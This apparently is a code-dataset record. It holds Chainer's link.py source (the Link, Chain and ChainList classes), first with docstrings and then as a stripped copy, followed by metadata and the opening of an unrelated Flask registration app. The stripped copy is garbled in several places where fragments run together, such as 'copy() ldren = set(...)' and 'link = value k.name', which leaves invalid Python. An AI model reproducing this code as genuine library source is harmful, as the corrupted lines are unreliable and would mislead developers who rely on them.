Returns:
A generator object that generates all links.
"""
if not skipself:
yield self
def namedlinks(self, skipself=False):
# type: (bool) -> tp.Iterator[tp.Tuple[str, 'Link']]
"""Returns a generator of all (path, link) pairs under the hierarchy.
Args:
skipself (bool): If ``True``, then the generator skips this link
and starts with the first child link.
Returns:
A generator object that generates all (path, link) pairs.
"""
if not skipself:
yield '/', self
def children(self):
# type: () -> tp.Iterator['Link']
"""Returns a generator of all child links.
Returns:
A generator object that generates all child links.
"""
if 0:
yield
def copyparams(self, link, copy_persistent=True):
# type: ('Link', bool) -> None
"""Copies all parameters from given link.
This method copies data arrays of all parameters in the hierarchy. The
copy is even done across the host and devices. Note that this method
does not copy the gradient arrays.
*From v5.0.0:* this method also copies the persistent values (e.g. the
moving statistics of :class:`~chainer.links.BatchNormalization`). If
the persistent value is an ndarray, the elements are copied. Otherwise,
it is copied using :func:`copy.deepcopy`. The old behavior (not copying
persistent values) can be reproduced with ``copy_persistent=False``.
Args:
link (Link): Source link object.
copy_persistent (bool): If ``True``, persistent values are also
copied. ``True`` by default.
"""
src = link.__dict__
dst = self.__dict__
for name in self._params:
dst[name].copydata(src[name])
if copy_persistent:
array_types = chainer.get_array_types()
for name in self._persistent:
d = dst[name]
s = src[name]
if isinstance(d, array_types) and isinstance(s, array_types):
backend.copyto(d, s)
else:
dst[name] = copy.deepcopy(s)
def cleargrads(self):
# type: () -> None
"""Clears all gradient arrays.
This method should be called before the backward computation at every
iteration of the optimization.
"""
for param in self.params():
param.cleargrad()
def zerograds(self):
# type: () -> None
"""Initializes all gradient arrays by zero.
.. deprecated:: v1.15
Use the more efficient :meth:`cleargrads` instead.
"""
warnings.warn(
'Link.zerograds is deprecated. Use Link.cleargrads instead.',
DeprecationWarning)
for param in self.params():
param.zerograd()
def addgrads(self, link):
# type: ('Link') -> None
"""Accumulates gradient values from given link.
This method adds each gradient array of the given link to corresponding
gradient array of this link. The accumulation is even done across
host and different devices.
Args:
link (Link): Source link object.
"""
src = link.__dict__
dst = self.__dict__
for name in self._params:
dst[name].addgrad(src[name])
def enable_update(self):
# type: () -> None
"""Enables update rules of all parameters under the link hierarchy.
This method sets the :attr:`~chainer.UpdateRule.enabled` flag of the
update rule of each parameter variable to ``True``.
"""
for param in self.params():
rule = param.update_rule
if rule is not None:
rule.enabled = True
def disable_update(self):
# type: () -> None
"""Disables update rules of all parameters under the link hierarchy.
This method sets the :attr:`~chainer.UpdateRule.enabled` flag of the
update rule of each parameter variable to ``False``.
"""
for param in self.params():
rule = param.update_rule
if rule is not None:
rule.enabled = False
@property
def update_enabled(self):
# type: () -> bool
"""``True`` if at least one parameter has an update rule enabled."""
for param in self.params():
rule = param.update_rule
if rule is not None and rule.enabled:
return True
return False
def serialize(self, serializer):
# type: (chainer.AbstractSerializer) -> None
"""Serializes the link object.
Args:
serializer (~chainer.AbstractSerializer): Serializer object.
"""
d = self.__dict__ # type: tp.Dict[str, chainer.Parameter]
for name in self._params:
param = d[name]
data = serializer(name, param.data) # type: types.NdArray
if param.data is None and data is not None:
# Initialize the parameter here
param.initialize(data.shape)
with chainer.using_device(param.device):
param.data[...] = param.device.send(data)
for name in self._persistent:
d[name] = serializer(name, d[name])
def repeat(self, n_repeat, mode='init'):
# type: (int, str) -> chainer.Sequential
"""Repeats this link multiple times to make a :class:`~chainer.Sequential`.
This method returns a :class:`~chainer.Sequential` object which has
the same :class:`~chainer.Link` multiple times repeatedly. The ``mode``
argument means how to copy this link to repeat.
.. admonition:: Example
You can repeat the same link multiple times to create a longer
:class:`~chainer.Sequential` block like this:
.. testcode::
class ConvBNReLU(chainer.Chain):
def __init__(self):
super(ConvBNReLU, self).__init__()
with self.init_scope():
self.conv = L.Convolution2D(
None, 64, 3, 1, 1, nobias=True)
self.bn = L.BatchNormalization(64)
def forward(self, x):
return F.relu(self.bn(self.conv(x)))
net = ConvBNReLU().repeat(16, mode='init')
The ``net`` object contains 16 blocks, each of which is
``ConvBNReLU``. And the ``mode`` was ``init``, so each block
is re-initialized with different parameters. If you give
``copy`` to this argument, each block has same values for its
parameters but its object ID is different from others. If it is
``share``, each block is same to others in terms of not only
parameters but also the object IDs because they are shallow-copied,
so that when the parameter of one block is changed, all the
parameters in the others also change.
Args:
n_repeat (int): Number of times to repeat.
mode (str): It should be either ``init``, ``copy``, or ``share``.
``init`` means parameters of each repeated element in the
returned :class:`~chainer.Sequential` will be re-initialized,
so that all elements have different initial parameters.
``copy`` means that the parameters will not be re-initialized
but object itself will be deep-copied, so that all elements
have same initial parameters but can be changed independently.
``share`` means all the elements which consist the resulting
:class:`~chainer.Sequential` object are same object because
they are shallow-copied, so that all parameters of elements
are shared with each other.
"""
ret = chainer.Sequential()
if n_repeat <= 0:
return ret
if mode not in ['init', 'copy', 'share']:
raise ValueError(
'The \'mode\' argument should be either \'init\','
'\'copy\', or \'share\'. But {} was given.'.format(mode))
link = self
for _ in range(n_repeat):
ret.append(link.copy(mode))
return ret
def count_params(self):
# type: () -> int
"""Counts the total number of parameters.
This method counts the total number of scalar values included in all
the :class:`~chainer.Parameter`\\ s held by this link and its
descendants.
If the link containts uninitialized parameters, this method raises a
warning.
Returns:
The total size of parameters (int)
"""
size = 0
for name, param in self.namedparams():
if param.array is None:
warnings.warn(
'Parameter \'{}\' has not been initialized, so the '
'resulting count will not include the number of parameters'
' in it.'.format(name))
continue
size += param.size
return size
def add_hook(self, hook, name=None):
# type: (chainer.LinkHook, tp.Optional[str]) -> 'Link'
"""Registers a link hook.
Args:
hook (~chainer.LinkHook): Link hook to be registered.
name (str): Name of the link hook. The name must be unique
among link hooks registered to this link. If ``None``,
the default name of the link hook is used.
Returns:
self
"""
if not isinstance(hook, link_hook.LinkHook):
raise TypeError('Hook must be of type LinkHook')
if name is None:
name = hook.name
hooks = self.local_link_hooks
if name in hooks:
raise KeyError('Hook %s already exists' % name)
hooks[name] = hook
hook.added(self)
return self
def delete_hook(self, name):
# type: (str) -> None
"""Unregisters the link hook.
Args:
name (str): The name of the link hook to be unregistered.
"""
if name in self.local_link_hooks:
self.local_link_hooks[name].deleted(self)
del self.local_link_hooks[name]
else:
raise KeyError('Hook %s does not exist' % name)
class Chain(Link):
"""Composable link with object-like interface.
Composability is one of the most important features of neural nets. Neural
net models consist of many reusable fragments, and each model itself might
be embedded into a larger learnable system. Chain enables us to write a
neural net based on composition, without bothering about routine works like
collecting parameters, serialization, copying the structure with parameters
shared, etc.
This class actually provides a way to compose one or more links into one
structure. A chain can contain one or more *child links*. Child link is a
link registered to the chain with its own name. The child link is stored to
an attribute of the chain with the name. User can write a whole model or a
fragment of neural nets as a child class of Chain.
Each chain itself is also a link. Therefore, one can combine chains into
higher-level chains. In this way, links and chains construct a *link
hierarchy*. Link hierarchy forms a tree structure, where each node is
identified by the path from the root. The path is represented by a string
like a file path in UNIX, consisting of names of nodes on the path, joined
by slashes ``/``.
A child link can be added just by assigning it to an attribute of the
chain within :meth:`~chainer.Chain.init_scope`.
The registered child link is saved and loaded on serialization and
deserialization, and involved in the optimization. The registered link
is called a child. The child link is accessible via :meth:`children`
generator, which returns a generator running through the children in
lexical order.
On registration of a child link, its :attr:`~Link.name` attribute is also
set (or overwritten if the link has already been registered to another
chain).
.. admonition:: Example
This is a simple example of custom chain definition. Chainer itself also
provides some chains defined under the :mod:`~chainer.links` module.
They might serve as examples, too.
Consider we want to define a multi-layer perceptron consisting of two
hidden layers with rectifiers as activation functions. We can use the
:class:`~chainer.links.Linear` link as a building block::
import chainer
import chainer.functions as F
import chainer.links as L
class MultiLayerPerceptron(chainer.Chain):
def __init__(self, n_in, n_hidden, n_out):
super(MultiLayerPerceptron, self).__init__()
with self.init_scope():
self.layer1 = L.Linear(n_in, n_hidden)
self.layer2 = L.Linear(n_hidden, n_hidden)
self.layer3 = L.Linear(n_hidden, n_out)
def forward(self, x):
# Forward propagation
h1 = F.relu(self.layer1(x))
h2 = F.relu(self.layer2(h1))
return self.layer3(h2)
Child links are registered via the assignment within a
``with self.init_scope():`` block. The forward propagation is often
implemented as the ``forward`` operator as the above example, though
it is not mandatory.
Args:
links: Child links. The keywords are used as their names. The names are
also set to the links.
"""
def __init__(self, **links):
# type: (**Link) -> None
super(Chain, self).__init__()
self._children = set() # type: tp.Set[str]
for name, link in six.iteritems(links):
self.add_link(name, link)
def __str__(self):
reps = []
for child in self.children():
rep = '({name}): {rep},'.format(
name=child.name, rep=str(child),
)
# Add indentation to each line.
for line in rep.splitlines():
reps.append(' {line}\n'.format(line=line))
reps = ''.join(reps)
if reps: # No newline with no children.
reps = '\n' + reps
return '{cls}({children})'.format(
cls=self.__class__.__name__, children=reps,
)
def __getitem__(self, name):
# type: (str) -> tp.Any
"""Equivalent to getattr."""
return getattr(self, name)
def __setattr__(self, name, value):
# type: (str, tp.Any) -> None
if self.within_init_scope and isinstance(value, Link):
if hasattr(self, name):
raise AttributeError(
'cannot register a new link %s: attribute exists' % name)
value.name = name
self._children.add(name)
super(Chain, self).__setattr__(name, value)
def __delattr__(self, name):
# type: (str) -> None
self._children.discard(name)
super(Chain, self).__delattr__(name)
def add_link(self, name, link):
# type: (str, Link) -> None
"""Registers a child link to this chain.
Args:
name (str): Name of the child link. This name is also used as the
attribute name.
link (Link): The link object to be registered.
"""
if name in self.__dict__:
raise AttributeError(
'cannot register a new link %s: attribute exists' % name)
if not isinstance(link, Link):
raise TypeError('cannot register a non-link object as a child')
with self.init_scope():
setattr(self, name, link)
def copy(self, mode='share'):
# type: (str) -> 'Chain'
ret = super(Chain, self).copy() # type: ignore # should be Chain
ret._children = set(ret._children) # type: ignore
d = ret.__dict__ # type: tp.Dict[str, Link]
for name in ret._children: # type: ignore
# copy child links recursively
copied = d[name].copy(mode)
copied.name = name
d[name] = copied
return ret # type: ignore
def device_resident_accept(self, visitor):
super(Chain, self).device_resident_accept(visitor)
d = self.__dict__
for name in self._children:
d[name].device_resident_accept(visitor)
def params(self, include_uninit=True):
# type: (bool) -> tp.Iterator[chainer.Parameter]
for param in super(Chain, self).params(include_uninit):
yield param
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
for param in d[name].params(include_uninit):
yield param
def namedparams(self, include_uninit=True):
# type: (bool) -> tp.Iterator[tp.Tuple[str, chainer.Parameter]]
for ret in super(Chain, self).namedparams(include_uninit):
yield ret
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
prefix = '/' + name
for path, param in d[name].namedparams(include_uninit):
yield prefix + path, param
def links(self, skipself=False):
# type: (bool) -> tp.Iterator[Link]
if not skipself:
yield self
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
for link in d[name].links():
yield link
def namedlinks(self, skipself=False):
# type: (bool) -> tp.Iterator[tp.Tuple[str, Link]]
if not skipself:
yield '/', self
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
child = d[name]
prefix = '/' + name
yield prefix, child
for path, link in d[name].namedlinks(True):
yield prefix + path, link
def children(self):
# type: () -> tp.Iterator[Link]
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
yield d[name]
def copyparams(self, link, copy_persistent=True):
# type: (Link, bool) -> None
super(Chain, self).copyparams(link, copy_persistent)
src = link.__dict__
dst = self.__dict__
for name in self._children:
dst[name].copyparams(src[name], copy_persistent)
def addgrads(self, link):
# type: (Link) -> None
super(Chain, self).addgrads(link)
src = link.__dict__
dst = self.__dict__
for name in self._children:
dst[name].addgrads(src[name])
def serialize(self, serializer):
# type: (chainer.AbstractSerializer) -> None
super(Chain, self).serialize(serializer)
d = self.__dict__ # type: tp.Dict[str, Link]
for name in self._children:
d[name].serialize(serializer[name])
class ChainList(Link, collections_abc.MutableSequence):
"""Composable link with list-like interface.
This is another example of compositional link. Unlike :class:`Chain`, this
class can be used like a list of child links. Each child link is indexed by
a non-negative integer, and it maintains the current number of registered
child links. The :meth:`add_link` method inserts a new link at the end of
the list. It is useful to write a chain with arbitrary number of child
links, e.g. an arbitrarily deep multi-layer perceptron.
This class inherits the methods `index`, `count`, `append`, `reverse`,
`extend`, `pop`, `remove` from `collections.abc.MutableSequence` and
can be accessed and assigned by index or slice.
Args:
links: Initial child links.
"""
def __init__(self, *links):
# type: (*Link) -> None
super(ChainList, self).__init__()
self._children = [] # type: tp.List[Link]
for link in links:
self.add_link(link)
def __str__(self):
reps = []
for index, child in enumerate(self._children):
rep = '({index}): {rep},'.format(
index=index, rep=str(child),
)
# Add indentation to each line.
for line in rep.splitlines():
reps.append(' {line}\n'.format(line=line))
reps = ''.join(reps)
if reps: # No newline with no children.
reps = '\n' + reps
return '{cls}({children})'.format(
cls=self.__class__.__name__, children=reps,
)
def __setattr__(self, name, value):
# type: (str, tp.Any) -> None
if self.within_init_scope and isinstance(value, Link):
raise TypeError(
'cannot register a new link'
' within a "with chainlist.init_scope():" block.')
super(ChainList, self).__setattr__(name, value)
def __setitem__(self, index, value):
# type: (tp.Union[int, slice], tp.Union[Link, tp.Iterable[Link]]) -> None # NOQA
if isinstance(index, int):
link = value # type: ignore # should be Link
link.name = str(index) # type: ignore
self._children[index] = link # type: ignore
elif isinstance(index, slice):
self._children[index] = value # type: ignore # should be Iterable[Link] # NOQA
for i, c in enumerate(self._children): # type: ignore
c.name = str(i)
else:
raise TypeError(
'ChainList indices must be integers or slices, not %s' %
type(index).__name__)
def __getitem__(self, index):
"""Returns the child at given index.
Args:
index (int): Index of the child in the list.
Returns:
Link: The ``index``-th child link.
"""
return self._children[index]
def __delitem__(self, index):
# type: (tp.Union[int, slice]) -> None
del self._children[index]
for i, c in enumerate(self._children):
c.name = str(i)
def insert(self, index, link):
# type: (int, Link) -> None
"""Insert a child link at the given index.
Args:
index (int): The position of the list where the new
link is inserted.
link (Link): The link to be inserted.
"""
if index == len(self._children):
self._children.append(link)
link.name = str(index)
else:
self._children.insert(index, link)
for i, c in enumerate(self._children):
c.name = str(i)
def __iter__(self):
# type: () -> tp.Iterator[Link]
return iter(self._children)
def __len__(self):
# type: () -> int
"""Returns the number of children."""
return len(self._children)
def add_link(self, link):
# type: (Link) -> None
"""Registers a child link and adds it to the tail of the list.
Args:
link (Link): The link object to be registered.
"""
self.append(link)
def copy(self, mode='share'):
# type: (str) -> 'ChainList'
"""Returns a deep copy of the chainlist."""
ret = super(ChainList, self).copy() # type: ignore # should be ChainList # NOQA
ret._children = list(ret._children) # type: ignore # copy
children = ret._children # type: ignore
for i, child in enumerate(children):
child = child.copy(mode)
child.name = str(i)
children[i] = child
return ret # type: ignore
def device_resident_accept(self, visitor):
super(ChainList, self).device_resident_accept(visitor)
for link in self._children:
link.device_resident_accept(visitor)
def params(self, include_uninit=True):
# type: (bool) -> tp.Iterator[chainer.Parameter]
for param in super(ChainList, self).params(include_uninit):
yield param
for link in self._children:
for param in link.params(include_uninit):
yield param
def namedparams(self, include_uninit=True):
# type: (bool) -> tp.Iterator[tp.Tuple[str, chainer.Parameter]]
for ret in super(ChainList, self).namedparams(include_uninit):
yield ret
for idx, link in enumerate(self._children):
prefix = '/%d' % idx
for path, param in link.namedparams(include_uninit):
yield prefix + path, param
def links(self, skipself=False):
# type: (bool) -> tp.Iterator[Link]
if not skipself:
yield self
for child in self._children:
for link in child.links():
yield link
def namedlinks(self, skipself=False):
# type: (bool) -> tp.Iterator[tp.Tuple[str, Link]]
if not skipself:
yield '/', self
for idx, child in enumerate(self._children):
prefix = '/%d' % idx
yield prefix, child
for path, link in child.namedlinks(True):
yield prefix + path, link
def children(self):
# type: () -> tp.Iterator[Link]
for child in self._children:
yield child
def copyparams(self, link, copy_persistent=True):
# type: (Link, bool) -> None # link is actually a ChainList
super(ChainList, self).copyparams(link, copy_persistent)
for idx, child in enumerate(self._children):
child.copyparams(link[idx], copy_persistent) # type: ignore
def addgrads(self, link):
# type: (Link) -> None # link is actually a ChainList
super(ChainList, self).addgrads(link)
for idx, child in enumerate(self._children):
child.addgrads(link[idx]) # type: ignore
def serialize(self, serializer):
# type: (chainer.AbstractSerializer) -> None
super(ChainList, self).serialize(serializer)
for idx, child in enumerate(self._children):
child.serialize(serializer['%d' % idx])
| 36.365893
| 119
| 0.595341
|
from __future__ import absolute_import
import collections
import contextlib
import copy
import typing as tp
import warnings
import numpy
import six
import chainer
from chainer import backend
from chainer.backends import cuda
from chainer import device_resident
from chainer import initializers
from chainer import link_hook
from chainer import types
from chainer.utils import collections_abc
from chainer import variable
def _is_shape(value):
if value is None:
return True
elif isinstance(value, collections_abc.Sequence):
try:
return all(int(x) for x in value)
except TypeError:
return False
try:
int(value)
return True
except TypeError:
return False
def _ensure_shape_dtype(value):
if _is_shape(value):
return value, numpy.float32
else:
return value
class Link(device_resident.DeviceResident):
_local_link_hooks = None _init_done = False
def __init__(self, **params):
super(Link, self).__init__()
self._params = set()
self._persistent = set()
self._within_init_scope = False
self.name = None
self.__init_done = True
for name, value in six.iteritems(params):
shape, dtype = _ensure_shape_dtype(value)
self.add_param(name, shape, dtype=dtype)
def __check_init_done(self):
if not self.__init_done:
raise RuntimeError('Link.__init__() has not been called.')
def __str__(self):
specs = ', '.join(
'{}={}'.format(k, v) for k, v in self.printable_specs
)
return '{cls}({specs})'.format(
cls=self.__class__.__name__, specs=specs,
)
@property
def local_link_hooks(self):
if self._local_link_hooks is None:
self._local_link_hooks = collections.OrderedDict()
return self._local_link_hooks
@property
def _n_local_link_hooks(self):
return (0 if self._local_link_hooks is None
else len(self._local_link_hooks))
@property
def _device_id(self):
warnings.warn(
'Link._device_id is left only for backward compatibility and '
'likely to be removed. Use Link.device instead.',
DeprecationWarning)
device = self.device
if device.xp is cuda.cupy:
return device.device.id
return None
@property
def printable_specs(self):
if 0:
yield
@property
def within_init_scope(self):
return getattr(self, '_within_init_scope', False)
@contextlib.contextmanager
def init_scope(self):
self.__check_init_done()
old_flag = self.within_init_scope
self._within_init_scope = True
try:
yield
finally:
self._within_init_scope = old_flag
def __call__(self, *args, **kwargs):
self.__check_init_done()
hooks = chainer._get_link_hooks()
if self._n_local_link_hooks > 0:
hooks = collections.OrderedDict(hooks)
hooks.update(self.local_link_hooks)
hooks = hooks.values()
if hooks:
pre_cb_args = link_hook._ForwardPreprocessCallbackArgs(
self, 'forward', args, kwargs)
for hook in hooks:
hook.forward_preprocess(pre_cb_args)
'__call__', None)
if forward is None:
forward = self.forward
out = forward(*args, **kwargs)
if hooks:
post_cb_args = link_hook._ForwardPostprocessCallbackArgs(
self, 'forward', args, kwargs, out)
for hook in hooks:
hook.forward_postprocess(post_cb_args)
return out
def __setattr__(self, name, value):
if self.within_init_scope and isinstance(value, variable.Parameter):
value.name = name
self._params.add(name)
self._persistent.discard(name)
super(Link, self).__setattr__(name, value)
def __delattr__(self, name):
self._params.discard(name)
self._persistent.discard(name)
super(Link, self).__delattr__(name)
def add_param(self, name, shape=None, dtype=numpy.float32,
initializer=None):
if name in self.__dict__:
raise AttributeError(
'cannot register a new parameter %s: attribute exists'
% name)
if initializer is None:
initializer = initializers.NaN(dtype)
param = variable.Parameter(initializer, shape)
with self.init_scope():
setattr(self, name, param)
def add_persistent(self, name, value):
d = self.__dict__
if name in d:
raise AttributeError(
'cannot register a new persistent value %s: attribute exists'
% name)
self._persistent.add(name)
self._params.discard(name)
d[name] = value
def register_persistent(self, name):
if not hasattr(self, name):
raise AttributeError(
'cannot register non-existent attribute %s as a persistent '
'value' % name)
self._persistent.add(name)
self._params.discard(name)
def copy(self, mode='share'):
if mode == 'share':
ret = copy.copy(self)
ret._params = set(self._params)
ret._persistent = set(self._persistent)
ret.name = None
d = ret.__dict__
for name in ret._params:
d[name] = copy.copy(d[name])
d[name].grad = None
return ret
elif mode == 'copy':
return copy.deepcopy(self)
elif mode == 'init':
ret = copy.deepcopy(self)
for param in ret.params(include_uninit=False):
param.initialize(param.shape)
return ret
else:
raise ValueError(
'The \'mode\' argument should be either \'init\','
'\'copy\', or \'share\'. But {} was given.'.format(mode))
def device_resident_accept(self, visitor):
super(Link, self).device_resident_accept(visitor)
d = self.__dict__
for name in self._params:
x = d[name]
visitor.visit_variable(x)
for name in self._persistent:
x = d[name]
if isinstance(x, chainer.get_array_types()):
d[name] = visitor.visit_array(x)
def params(self, include_uninit=True):
d = self.__dict__
for name in sorted(self._params):
if include_uninit or d[name].data is not None:
yield d[name]
def namedparams(self, include_uninit=True):
d = self.__dict__
for name in sorted(self._params):
if include_uninit or d[name].data is not None:
yield '/' + name, d[name]
def links(self, skipself=False):
if not skipself:
yield self
def namedlinks(self, skipself=False):
if not skipself:
yield '/', self
def children(self):
if 0:
yield
def copyparams(self, link, copy_persistent=True):
src = link.__dict__
dst = self.__dict__
for name in self._params:
dst[name].copydata(src[name])
if copy_persistent:
array_types = chainer.get_array_types()
for name in self._persistent:
d = dst[name]
s = src[name]
if isinstance(d, array_types) and isinstance(s, array_types):
backend.copyto(d, s)
else:
dst[name] = copy.deepcopy(s)
def cleargrads(self):
for param in self.params():
param.cleargrad()
def zerograds(self):
warnings.warn(
'Link.zerograds is deprecated. Use Link.cleargrads instead.',
DeprecationWarning)
for param in self.params():
param.zerograd()
def addgrads(self, link):
src = link.__dict__
dst = self.__dict__
for name in self._params:
dst[name].addgrad(src[name])
def enable_update(self):
for param in self.params():
rule = param.update_rule
if rule is not None:
rule.enabled = True
def disable_update(self):
for param in self.params():
rule = param.update_rule
if rule is not None:
rule.enabled = False
@property
def update_enabled(self):
for param in self.params():
rule = param.update_rule
if rule is not None and rule.enabled:
return True
return False
def serialize(self, serializer):
d = self.__dict__
for name in self._params:
param = d[name]
data = serializer(name, param.data)
if param.data is None and data is not None:
param.initialize(data.shape)
with chainer.using_device(param.device):
param.data[...] = param.device.send(data)
for name in self._persistent:
d[name] = serializer(name, d[name])
def repeat(self, n_repeat, mode='init'):
ret = chainer.Sequential()
if n_repeat <= 0:
return ret
if mode not in ['init', 'copy', 'share']:
raise ValueError(
'The \'mode\' argument should be either \'init\','
'\'copy\', or \'share\'. But {} was given.'.format(mode))
link = self
for _ in range(n_repeat):
ret.append(link.copy(mode))
return ret
def count_params(self):
size = 0
for name, param in self.namedparams():
if param.array is None:
warnings.warn(
'Parameter \'{}\' has not been initialized, so the '
'resulting count will not include the number of parameters'
' in it.'.format(name))
continue
size += param.size
return size
def add_hook(self, hook, name=None):
if not isinstance(hook, link_hook.LinkHook):
raise TypeError('Hook must be of type LinkHook')
if name is None:
name = hook.name
hooks = self.local_link_hooks
if name in hooks:
raise KeyError('Hook %s already exists' % name)
hooks[name] = hook
hook.added(self)
return self
def delete_hook(self, name):
if name in self.local_link_hooks:
self.local_link_hooks[name].deleted(self)
del self.local_link_hooks[name]
else:
raise KeyError('Hook %s does not exist' % name)
class Chain(Link):
def __init__(self, **links):
super(Chain, self).__init__()
self._children = set()
for name, link in six.iteritems(links):
self.add_link(name, link)
def __str__(self):
reps = []
for child in self.children():
rep = '({name}): {rep},'.format(
name=child.name, rep=str(child),
)
for line in rep.splitlines():
reps.append(' {line}\n'.format(line=line))
reps = ''.join(reps)
if reps:
reps = '\n' + reps
return '{cls}({children})'.format(
cls=self.__class__.__name__, children=reps,
)
def __getitem__(self, name):
return getattr(self, name)
def __setattr__(self, name, value):
if self.within_init_scope and isinstance(value, Link):
if hasattr(self, name):
raise AttributeError(
'cannot register a new link %s: attribute exists' % name)
value.name = name
self._children.add(name)
super(Chain, self).__setattr__(name, value)
def __delattr__(self, name):
self._children.discard(name)
super(Chain, self).__delattr__(name)
def add_link(self, name, link):
if name in self.__dict__:
raise AttributeError(
'cannot register a new link %s: attribute exists' % name)
if not isinstance(link, Link):
raise TypeError('cannot register a non-link object as a child')
with self.init_scope():
setattr(self, name, link)
def copy(self, mode='share'):
ret = super(Chain, self).copy() ldren = set(ret._children)
d = ret.__dict__
for name in ret._children:
copied = d[name].copy(mode)
copied.name = name
d[name] = copied
return ret
def device_resident_accept(self, visitor):
super(Chain, self).device_resident_accept(visitor)
d = self.__dict__
for name in self._children:
d[name].device_resident_accept(visitor)
def params(self, include_uninit=True):
for param in super(Chain, self).params(include_uninit):
yield param
d = self.__dict__
for name in sorted(self._children):
for param in d[name].params(include_uninit):
yield param
def namedparams(self, include_uninit=True):
for ret in super(Chain, self).namedparams(include_uninit):
yield ret
d = self.__dict__
for name in sorted(self._children):
prefix = '/' + name
for path, param in d[name].namedparams(include_uninit):
yield prefix + path, param
def links(self, skipself=False):
if not skipself:
yield self
d = self.__dict__
for name in sorted(self._children):
for link in d[name].links():
yield link
def namedlinks(self, skipself=False):
if not skipself:
yield '/', self
d = self.__dict__
for name in sorted(self._children):
child = d[name]
prefix = '/' + name
yield prefix, child
for path, link in d[name].namedlinks(True):
yield prefix + path, link
def children(self):
d = self.__dict__
for name in sorted(self._children):
yield d[name]
def copyparams(self, link, copy_persistent=True):
super(Chain, self).copyparams(link, copy_persistent)
src = link.__dict__
dst = self.__dict__
for name in self._children:
dst[name].copyparams(src[name], copy_persistent)
def addgrads(self, link):
super(Chain, self).addgrads(link)
src = link.__dict__
dst = self.__dict__
for name in self._children:
dst[name].addgrads(src[name])
def serialize(self, serializer):
super(Chain, self).serialize(serializer)
d = self.__dict__
for name in self._children:
d[name].serialize(serializer[name])
class ChainList(Link, collections_abc.MutableSequence):
def __init__(self, *links):
super(ChainList, self).__init__()
self._children = []
for link in links:
self.add_link(link)
def __str__(self):
reps = []
for index, child in enumerate(self._children):
rep = '({index}): {rep},'.format(
index=index, rep=str(child),
)
for line in rep.splitlines():
reps.append(' {line}\n'.format(line=line))
reps = ''.join(reps)
if reps:
reps = '\n' + reps
return '{cls}({children})'.format(
cls=self.__class__.__name__, children=reps,
)
def __setattr__(self, name, value):
if self.within_init_scope and isinstance(value, Link):
raise TypeError(
'cannot register a new link'
' within a "with chainlist.init_scope():" block.')
super(ChainList, self).__setattr__(name, value)
def __setitem__(self, index, value):
if isinstance(index, int):
link = value k.name = str(index)
self._children[index] = link
elif isinstance(index, slice):
self._children[index] = value ._children):
c.name = str(i)
else:
raise TypeError(
'ChainList indices must be integers or slices, not %s' %
type(index).__name__)
def __getitem__(self, index):
return self._children[index]
def __delitem__(self, index):
del self._children[index]
for i, c in enumerate(self._children):
c.name = str(i)
def insert(self, index, link):
if index == len(self._children):
self._children.append(link)
link.name = str(index)
else:
self._children.insert(index, link)
for i, c in enumerate(self._children):
c.name = str(i)
def __iter__(self):
return iter(self._children)
def __len__(self):
return len(self._children)
def add_link(self, link):
self.append(link)
def copy(self, mode='share'):
ret = super(ChainList, self).copy() _children) children = ret._children
for i, child in enumerate(children):
child = child.copy(mode)
child.name = str(i)
children[i] = child
return ret
def device_resident_accept(self, visitor):
super(ChainList, self).device_resident_accept(visitor)
for link in self._children:
link.device_resident_accept(visitor)
def params(self, include_uninit=True):
for param in super(ChainList, self).params(include_uninit):
yield param
for link in self._children:
for param in link.params(include_uninit):
yield param
def namedparams(self, include_uninit=True):
for ret in super(ChainList, self).namedparams(include_uninit):
yield ret
for idx, link in enumerate(self._children):
prefix = '/%d' % idx
for path, param in link.namedparams(include_uninit):
yield prefix + path, param
def links(self, skipself=False):
if not skipself:
yield self
for child in self._children:
for link in child.links():
yield link
def namedlinks(self, skipself=False):
if not skipself:
yield '/', self
for idx, child in enumerate(self._children):
prefix = '/%d' % idx
yield prefix, child
for path, link in child.namedlinks(True):
yield prefix + path, link
def children(self):
for child in self._children:
yield child
def copyparams(self, link, copy_persistent=True):
f).copyparams(link, copy_persistent)
for idx, child in enumerate(self._children):
child.copyparams(link[idx], copy_persistent)
def addgrads(self, link):
f).addgrads(link)
for idx, child in enumerate(self._children):
child.addgrads(link[idx])
def serialize(self, serializer):
super(ChainList, self).serialize(serializer)
for idx, child in enumerate(self._children):
child.serialize(serializer['%d' % idx])
| true
| true
|
f70b3d490480e2c44304416517d3b896c717c71a
| 5,994
|
py
|
Python
|
application.py
|
jlind062/flippin_flask
|
94c092ad49f9f7ab7995073d3382015d598e45f5
|
[
"MIT"
] | 3
|
2019-06-22T19:00:10.000Z
|
2019-06-23T18:33:46.000Z
|
application.py
|
sourenaKhanzadeh/flippin_flask
|
94c092ad49f9f7ab7995073d3382015d598e45f5
|
[
"MIT"
] | 1
|
2021-06-01T23:52:53.000Z
|
2021-06-01T23:52:53.000Z
|
application.py
|
sourenaKhanzadeh/flippin_flask
|
94c092ad49f9f7ab7995073d3382015d598e45f5
|
[
"MIT"
] | 2
|
2019-06-22T19:00:19.000Z
|
2019-06-22T20:33:19.000Z
|
from flask import Flask, render_template, request, flash, redirect, url_for, session
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Message, Mail
from passlib.hash import sha256_crypt
from functools import wraps
import requests
import time
# create the flask app from config file and instantiate db
application = Flask(__name__)
application.config.from_object('config.AWSConfig')
db = SQLAlchemy(application)
# init mail client
mail = Mail()
mail.init_app(application)
# have to import since models relies on db object
from models import Cities, Users, Listings
from forms import RegisterForm, ContactForm, ProfileForm
# custom decorator to verify user is logged in
def is_logged_in(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash ("Please login to see this content.", "danger")
return redirect(url_for('login'))
return wrap
# register user with form and validating from wtforms
# if valid notify user and redirect if successful, otherwise display error
@application.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
# use passwordrandom.com to get user ip and recommend password
recommendation = requests.get('https://www.passwordrandom.com/query?command=password')\
.content.decode("utf-8")
ip = requests.get('https://www.passwordrandom.com/query?command=ip').\
content.decode("utf-8")
flash("We recommend using password: '%s'" % recommendation, 'warning')
if request.method == 'POST' and form.validate():
new_user = Users(first=form.first.data,
last=form.last.data,
email=form.email.data,
username=form.username.data,
city=form.city.data,
password=sha256_crypt.encrypt(str(form.password.data)),
ip=ip,
